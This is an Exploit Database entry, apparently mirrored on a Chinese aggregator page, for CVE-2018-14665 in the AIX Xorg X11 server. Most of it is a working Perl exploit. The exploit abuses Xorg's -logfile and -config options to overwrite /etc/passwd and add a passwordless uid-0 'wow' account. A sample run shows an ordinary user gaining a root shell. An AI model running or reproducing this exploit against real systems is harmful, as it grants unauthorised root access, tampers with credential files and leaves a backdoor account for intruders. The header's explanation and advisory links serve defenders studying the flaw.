Xorg X11 Server (AIX) – Local Privilege Escalation

• Exploit Database
• 49 阅读

• 作者： 0xdono
  日期： 2018-12-04
• 类别：

  • local
  平台：

  • aix
• 来源：https://www.exploit-db.com/exploits/45938/

• # Exploit Title: AIX Xorg X11 Server - Local Privilege Escalation
  # Date: 29/11/2018
  # Exploit Author: @0xdono
  # Original Discovery and Exploit: Narendra Shinde
  # Vendor Homepage: https://www.x.org/
  # Platform: AIX
  # Version: X Window System Version 7.1.1
  # Fileset: X11.base.rte < 7.1.5.32
  # Tested on: AIX 7.1 (6.x to 7.x should be vulnerable)
  # CVE: CVE-2018-14665
  #
  # Explanation:
  # Incorrect command-line parameter validation in the Xorg X server can
  # lead to privilege elevation and/or arbitrary files overwrite, when the
  # X server is running with elevated privileges.
  # The -logfile argument can be used to overwrite arbitrary files in the
  # file system, due to incorrect checks in the parsing of the option.
  #
  # This is a port of the OpenBSD X11 Xorg exploit to run on AIX.
  # It overwrites /etc/passwd in order to create a new user with root privileges. 
  # All currently logged in users need to be included when /etc/passwd is overwritten,
  # else AIX will throw 'Cannot get "LOGNAME" variable' when attempting to change user.
  # The Xorg '-fp' parameter used in the OpenBSD exploit does not work on AIX,
  # and is replaced by '-config'.
  # ksh93 is used for ANSI-C quoting, and is installed by default on AIX.
  #
  # IBM has not yet released a patch as of 29/11/2018.
  #
  # See also:
  # https://lists.x.org/archives/xorg-announce/2018-October/002927.html
  # https://www.securepatterns.com/2018/10/cve-2018-14665-xorg-x-server.html
  # https://github.com/dzflack/exploits/blob/master/aix/aixxorg.pl
  #
  # Usage:
  #$ oslevel -s
  #7100-04-00-0000
  #$ Xorg -version
  #
  #X Window System Version 7.1.1
  #Release Date: 12 May 2006
  #X Protocol Version 11, Revision 0, Release 7.1.1
  #Build Operating System: AIX IBM
  #Current Operating System: AIX sovma470 1 7 00C3C6F54C00
  #Build Date: 07 July 2006
  #Before reporting problems, check http://wiki.x.org
  #to make sure that you have the latest version.
  #Module Loader present
  #$ id
  #uid=16500(nmyo) gid=1(staff)
  #$ perl aixxorg.pl
  #[+] AIX X11 server local root exploit
  #[-] Checking for Xorg and ksh93 
  #[-] Opening /etc/passwd 
  #[-] Retrieving currently logged in users 
  #[-] Generating Xorg command 
  #[-] Opening /tmp/wow.ksh 
  #[-] Writing Xorg command to /tmp/wow.ksh 
  #[-] Backing up /etc/passwd to /tmp/passwd.backup 
  #[-] Making /tmp/wow.ksh executable 
  #[-] Executing /tmp/wow.ksh 
  #[-] Cleaning up /etc/passwd and removing /tmp/wow.ksh 
  #[-] Done 
  #[+] 'su wow' for root shell 
  #$ su wow
  ## id
  #uid=0(root) gid=0(system)
  ## whoami
  #root
  
  #!/usr/bin/perl
  print "[+] AIX X11 server local root exploit\n";
  
  # Check Xorg is in path
  print "[-] Checking for Xorg and ksh93 \n";
  chomp($xorg = `command -v Xorg`);
  if ($xorg eq ""){ 
  print "[X] Can't find Xorg binary, try hardcode it? exiting... \n";
  exit;
  }
  
  # Check ksh93 is in path
  chomp($ksh = `command -v ksh93`);
  if ($ksh eq ""){
  print "[X] Can't find ksh93 binary, try hardcode it? exiting... \n";
  exit;
  }
  
  # Read in /etc/passwd
  print "[-] Opening /etc/passwd \n";
  open($passwd_fh, '<', "/etc/passwd");
  chomp(@passwd_array = <$passwd_fh>);
  close($passwd_fh);
  
  # Retrieve currently logged in users
  print "[-] Retrieving currently logged in users \n";
  @users = `who | cut -d' ' -f1 | sort | uniq`;
  chomp(@users);
  
  # For all logged in users, add their current passwd entry to string
  # that will be used to overwrite passwd
  $users_logged_in_passwd = '';
  foreach my $user (@users)
  {
  $user .= ":";
  foreach my $line (@passwd_array)
  {
  if (index($line, $user) == 0) {
  $users_logged_in_passwd = $users_logged_in_passwd . '\n' . $line;
  }
  }
  }
  
  # Use '-config' as '-fp' (which is used in the original BSD exploit) is not written to log
  print "[-] Generating Xorg command \n";
  $blob = '-config ' . '$\'' . $users_logged_in_passwd . '\nwow::0:0::/:/usr/bin/ksh\n#' . '\'';
  
  print "[-] Opening /tmp/wow.ksh \n";		
  open($fr, '>', "/tmp/wow.ksh");
  
  # Use ksh93 for ANSI-C quoting
  print "[-] Writing Xorg command to /tmp/wow.ksh \n";
  print $fr '#!' . "$ksh\n";
  print $fr "$xorg $blob -logfile ../etc/passwd :1> /dev/null 2>&1 \n";
  close $fr;
  
  # Backup passwd 
  print "[-] Backing up /etc/passwd to /tmp/passwd.backup \n";
  system("cp /etc/passwd /tmp/passwd.backup");
  
  # Make script executable and run it
  print "[-] Making /tmp/wow.ksh executable \n";
  system("chmod +x /tmp/wow.ksh");
  print "[-] Executing /tmp/wow.ksh \n";
  system("/tmp/wow.ksh");
  
  # Replace overwritten passwd with: original passwd + wow user
  print "[-] Cleaning up /etc/passwd and removing /tmp/wow.ksh \n";
  $result = `su wow "-c cp /tmp/passwd.backup /etc/passwd && echo 'wow::0:0::/:/usr/bin/ksh' >> /etc/passwd" && rm /tmp/wow.ksh`;
  
  print "[-] Done \n";
  print "[+] 'su wow' for root shell \n";